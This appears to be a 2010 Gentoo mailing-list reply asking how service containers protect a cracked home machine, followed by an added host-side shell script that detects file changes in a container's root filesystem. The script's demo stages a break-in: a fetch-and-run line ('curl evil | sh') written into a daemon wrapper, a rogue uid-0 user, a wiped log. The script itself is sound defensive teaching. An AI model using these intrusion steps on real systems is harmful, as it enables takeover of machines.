On Fri, Aug 13, 2010 at 8:25 AM, Enrico Weigelt <weigelt@×××××.de> wrote:
> * Paul Hartman <paul.hartman+gentoo@×××××.com> wrote:
>
> <snip>
>
> Apropos cracked machines:
>
> In recent years I have often had trouble with cracked customers' boxes
> (one, e.g., was abused for SIP-calling people around the world and
> asking them for their debit card codes ;-o). So I thought about
> protection against those scenarios. The solution:
>
> Put all remotely available services into containers and make the
> host system only accessible via special channels (e.g. serial console).
> You can run automatic sanity tests and security alerts from the host
> system, which cannot be hijacked (as long as there's no kernel
> bug which allows escaping a container ;-o).
>
> This also brings several other benefits, e.g. easier backups, quick
> migration to other machines, etc.
>
>
> cu

Hi Enrico,
Since I'm not an IT guy, could you please explain this just a bit
more? What is 'a container'? Is it a chroot running on the same
machine? A different machine? Something completely different?

In the OP's case (I believe) he thought a personal machine at home
was compromised. If that's the case then, without doubling my
electrical bill (2 computers), how would I implement your containers?

Thanks,
Mark
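The design Enrico describes keeps the sanity checks on the host, where a cracked container cannot reach them, and everything runs on the one machine. The script below is an added example of such a host-side check; it is not code from the thread or from Enrico. It assumes the container's root is a directory the host can read, which holds for a chroot and for the Linux container systems of the time such as OpenVZ, Linux-VServer and LXC (the thread does not say which one Enrico used), and that the baseline manifest is stored on the host, outside the container. It hashes every regular file under the rootfs once, then on each later run reports which files were modified, added or removed. The `demo` function, with its constructed rootfs and staged break-in, exists only to show what the report looks like; all paths in it are made up.

```shell
#!/bin/sh
# Host-side integrity check of a container's root filesystem.
# Added example for this thread, not Enrico's code. Assumptions: the
# container's root is a directory the host can read (as with a chroot,
# LXC or OpenVZ rootfs), and the baseline manifest lives on the host,
# where a process inside the container cannot reach it.

# make_baseline ROOTFS OUT: write "sha256  ./path" for every regular file
# under ROOTFS. Lines are sorted as whole lines so comm(1) can diff them.
make_baseline() {
    ( cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort ) > "$2"
}

# report_drift BASELINE CURRENT: print one line per changed path:
# MODIFIED (content differs), ADDED (new file), REMOVED (file gone).
# A modified file appears as a line unique to each manifest, so its
# path is in both the "only in current" and "only in baseline" sets.
report_drift() {
    bl=$(mktemp); cur=$(mktemp); new=$(mktemp); gone=$(mktemp)
    LC_ALL=C sort "$1" > "$bl"
    LC_ALL=C sort "$2" > "$cur"
    LC_ALL=C comm -13 "$bl" "$cur" | sed 's/^[0-9a-f]*  //' | LC_ALL=C sort > "$new"
    LC_ALL=C comm -23 "$bl" "$cur" | sed 's/^[0-9a-f]*  //' | LC_ALL=C sort > "$gone"
    LC_ALL=C comm -12 "$new" "$gone" | sed 's/^/MODIFIED /'
    LC_ALL=C comm -23 "$new" "$gone" | sed 's/^/ADDED /'
    LC_ALL=C comm -13 "$new" "$gone" | sed 's/^/REMOVED /'
    rm -f "$bl" "$cur" "$new" "$gone"
}

# check_rootfs ROOTFS BASELINE: rebuild the manifest and compare.
# Prints the drift report and returns 1 if anything changed, 0 if clean.
# Meant for the host's cron; pipe the output to mail or a pager.
check_rootfs() {
    current=$(mktemp)
    make_baseline "$1" "$current"
    drift=$(report_drift "$2" "$current")
    rm -f "$current"
    if [ -n "$drift" ]; then
        printf '%s\n' "$drift"
        return 1
    fi
    return 0
}

# demo: constructed rootfs, baseline, then a staged break-in from inside
# the container (all paths and contents are made up). Prints the report.
demo() {
    tmp=$(mktemp -d); rootfs=$tmp/rootfs
    mkdir -p "$rootfs/etc" "$rootfs/usr/sbin" "$rootfs/var/log"
    printf 'root:x:0:0:root:/root:/bin/sh\n' > "$rootfs/etc/passwd"
    printf '#!/bin/sh\nexec /usr/sbin/asterisk.real "$@"\n' > "$rootfs/usr/sbin/asterisk"
    printf 'service started\n' > "$rootfs/var/log/messages"
    make_baseline "$rootfs" "$tmp/baseline"
    # Intruder: adds a uid-0 user, trojans the SIP daemon wrapper,
    # wipes the log and drops a beacon in /tmp.
    printf 'eve:x:0:0::/:/bin/sh\n' >> "$rootfs/etc/passwd"
    printf 'curl evil | sh\n' > "$rootfs/usr/sbin/asterisk"
    rm -f "$rootfs/var/log/messages"
    mkdir -p "$rootfs/tmp"; printf 'beacon\n' > "$rootfs/tmp/.x"
    check_rootfs "$rootfs" "$tmp/baseline" || :
    rm -rf "$tmp"
}

# demo_clean: a fresh baseline against an unchanged rootfs must return 0.
demo_clean() {
    tmp=$(mktemp -d); rootfs=$tmp/rootfs
    mkdir -p "$rootfs/etc"; printf 'box\n' > "$rootfs/etc/hostname"
    make_baseline "$rootfs" "$tmp/baseline"
    if check_rootfs "$rootfs" "$tmp/baseline"; then rc=0; else rc=1; fi
    rm -rf "$tmp"
    return $rc
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

From the host, run `make_baseline` once on the container's rootfs right after provisioning and store the manifest somewhere the container cannot write, then run `check_rootfs` from the host's cron and mail yourself the output (the rootfs and manifest paths are whatever your container system uses; none are given in the thread). The check only sees changes to the container's filesystem: it does nothing against the kernel escape Enrico's own message flags as the remaining hole, and a baseline taken from an already cracked box is worthless.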